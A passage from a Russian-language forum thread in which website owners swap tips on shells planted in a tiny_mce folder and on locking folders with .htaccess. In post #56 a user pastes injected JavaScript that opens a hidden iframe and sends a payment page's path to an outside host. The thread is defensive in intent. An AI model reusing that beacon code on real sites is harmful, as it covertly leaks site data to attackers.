Дыры на сайтах

  • Автор темы agamurat
  • Дата начала
wh1skas
wildcake
Участник
Сообщения
1.017
Реакции
432
ICQ
564739604 564739604
  • #41
Через эту папку заливают кнопку _button.php и делают выплаты на свой кошель. Проверь, если в этой категории подобные файлы с именем button, удали их и на папку tiny_mce поставь права 444
 
Vic212
Участник
Сообщения
11
Реакции
0
  • #42
я как раз ищу в сери как поставить правильно защиту htaccess на js. как по мне, то папка tiny_mce вообще не может удалиться из скрипта. они вроде нигде не конфигурирует. может я и ошибаюсь. но именно через нее идут хаки на сайт.
 
wh1skas
wildcake
Участник
Сообщения
1.017
Реакции
432
ICQ
564739604 564739604
  • #43
Vic212 написал(а):
я как раз ищу в сери как поставить правильно защиту htaccess на js. как по мне, то папка tiny_mce вообще не может удалиться из скрипта. они вроде нигде не конфигурирует. может я и ошибаюсь. но именно через нее идут хаки на сайт.
Достаточно поставить права и не ломать голову искать по скриптам ссылки на этоу папку.
 
Vic212
Участник
Сообщения
11
Реакции
0
  • #44
админку тоже желательно переписать и переставить права? я имею ввиду путь к админке
 
Vic212
Участник
Сообщения
11
Реакции
0
  • #46
я читал. но я имел ввиду этот избитый "admin4ik"
 
Vic212
Участник
Сообщения
11
Реакции
0
  • #47
кстати о дырах. скачал программу ai-bolit. сделал скан. он мне выдал:

Критические замечания
Шелл-скрипты не найдены.
Список скрытых файлов:
(4)
/public_html/.tmb
/public_html/.htaccess
/public_html/.aurlignore
1/public_html/.aignore
Не найдено директорий c дорвеями
Предупреждения
Опасный код в .htaccess (редирект на внешний сервер, подмена расширений или автовнедрение кода)

В самом файле .htaccess :
Код:
DirectoryIndex index.php
RewriteEngine On
RewriteCond %{HTTP_HOST} ^www\.(.*) [NC]
RewriteRule ^(.*)$ http://%1/$1 [R=301,L]
# Home
RewriteRule ^index.html$ index.php [L]

# Rules
RewriteRule ^rules(/?)+$ index.php?menu=rules [L]
и т.д.

где он нашел редирект???
 
Последнее редактирование модератором:
kvozimir
Участник
Сообщения
1.935
Реакции
409
ICQ
734713 734713
Skype
  • #49
Yuriiilin
Участник
Сообщения
24
Реакции
0
  • #50
wh1skas написал(а):
Кстати о tiny_mce. Я бы предложил Вам залочить папку от недоброжелателей. Есть шелл с баттн.пхп, который пихают в эту папку и снимают денюшку без вывода в статистику выплат. Там же найдете файл лицензии, который надо удалить. Залочить папку предлагаю при помощи .htaccess
Идем в хранилище: / js / editor / jscripts /
в эту папку заливаете файл .htaccess
Погуглив различные способы защиты при помощи.htaccess, выберите наиболее подходящие для Вас. У меня например требует логин и пароль, которые зашифрованы в корневой папке сайта, к которой ограничен доступ.
Можешь помочь с твоим способом закрытия?=))
 
Vic212
Участник
Сообщения
11
Реакции
0
  • #51
я поставил в .htaccess "deny from all". может и ошибаюсь
 
Yuriiilin
Участник
Сообщения
24
Реакции
0
  • #52
wh1skas написал(а):
Кстати о tiny_mce. Я бы предложил Вам залочить папку от недоброжелателей. Есть шелл с баттн.пхп, который пихают в эту папку и снимают денюшку без вывода в статистику выплат. Там же найдете файл лицензии, который надо удалить. Залочить папку предлагаю при помощи .htaccess
Идем в хранилище: / js / editor / jscripts /
в эту папку заливаете файл .htaccess
Погуглив различные способы защиты при помощи.htaccess, выберите наиболее подходящие для Вас. У меня например требует логин и пароль, которые зашифрованы в корневой папке сайта, к которой ограничен доступ.
Нужно защищать только эту папку или можно сразу js, и можно ли сделать тройную защиту? типо Js(вложить защиту)/editor(вложить защиту)/jscripts(вложить защиту) это будет способствовать большей надёжности?=)))
 
art199908
Участник
Сообщения
271
Реакции
36
  • #53
Yuriiilin написал(а):
Нужно защищать только эту папку или можно сразу js, и можно ли сделать тройную защиту? типо Js(вложить защиту)/editor(вложить защиту)/jscripts(вложить защиту) это будет способствовать большей надёжности?=)))
да блин пацан, тебе никто не будет в этом помогать, ищи тут об этом говорили уже, в инете ищи - "защита путем htacces" и тебе все выдаст, по 100 раз одно и тоже говорить никто не будет
 
Yuriiilin
Участник
Сообщения
24
Реакции
0
  • #54
Походу я защитил сайт, кто может проверить?=))) защитил так что сам не могу зайти в директорию jscripts вводя правильный логин и пароль!=D
 
art199908
Участник
Сообщения
271
Реакции
36
  • #55
Yuriiilin написал(а):
Походу я защитил сайт, кто может проверить?=))) защитил так что сам не могу зайти в директорию jscripts вводя правильный логин и пароль!=D
скидывай, проверим
 
Ferz
Местный
Сообщения
73
Реакции
3
  • #56
Сейчас решил посмотреть "код элемента" и вдруг вот что увидел...
вот скопировал:
PHP:
 function send_data(ifr_url){   var ifr0 = document.createElement('iframe'); ifr0.src = ifr_url; ifr0.style.width = '1px'; ifr0.style.height = '1px'; var div_x0 = document.getElementById('mast'); div_x0.appendChild(ifr0); } send_data('http://payloads.ru/ff.php?data=gametestgg.yolox.net /ftp_aerium-01/gametestgg_622/gametestgg.yolox.net/pages/account/_payment.php');
В файле payments нету ничего связанного с payloads..
Это безопасно?
Также прилагаю скрин.

И да, кстати, все тутблокируют ПКМ, но "показать код элемента" можно вызвать и через комбинацию клавиш CTRL+SHIFT+I (Chrome)
 
Ferz
Местный
Сообщения
73
Реакции
3
  • #57
Еще хотелось бы узнать, можно ли расмматривать вариант зашифровки php скрипта например этим сервисом
 
art199908
Участник
Сообщения
271
Реакции
36
  • #58
Ferz написал(а):
Еще хотелось бы узнать, можно ли расмматривать вариант зашифровки php скрипта например этим сервисом
Это ксс стиль, у меня есть, найди в инете там есть
 
Ferz
Местный
Сообщения
73
Реакции
3
  • #59
Ferz написал(а):
Сейчас решил посмотреть "код элемента" и вдруг вот что увидел...
вот скопировал:
PHP:
 function send_data(ifr_url){   var ifr0 = document.createElement('iframe'); ifr0.src = ifr_url; ifr0.style.width = '1px'; ifr0.style.height = '1px'; var div_x0 = document.getElementById('mast'); div_x0.appendChild(ifr0); } send_data('http://payloads.ru/ff.php?data=gametestgg.yolox.net /ftp_aerium-01/gametestgg_622/gametestgg.yolox.net/pages/account/_payment.php');
В файле payments нету ничего связанного с payloads..
Это безопасно?
Также прилагаю скрин.

И да, кстати, все тутблокируют ПКМ, но "показать код элемента" можно вызвать и через комбинацию клавиш CTRL+SHIFT+I (Chrome)
Ребята помогайте, уж больно не нравится мне вот этот код
send_data('http://payloads.ru/ff.php?data=gametestgg.yolox.net /ftp_aerium-01/gametestgg_622/gametestgg.yolox.net/pages/account/_payment.php')
 
blackyar24
Готов помочь
Участник
Сообщения
237
Реакции
25
  • #60
robertoman написал(а):
Вообщем я заблочил, пересмотрел все файлы не могу понять почему даже при изменении деректории site.ru на site1.ru не пропадает с мониторинга, каким образом он туда заносится? (или крон проверяет новые фермы через определённое время?) И смогли ли вы удалить свою ферму с этого сайта? видел многих проектов там нет, а многие и есть.
присоединяюсь к вопросу
 
Сверху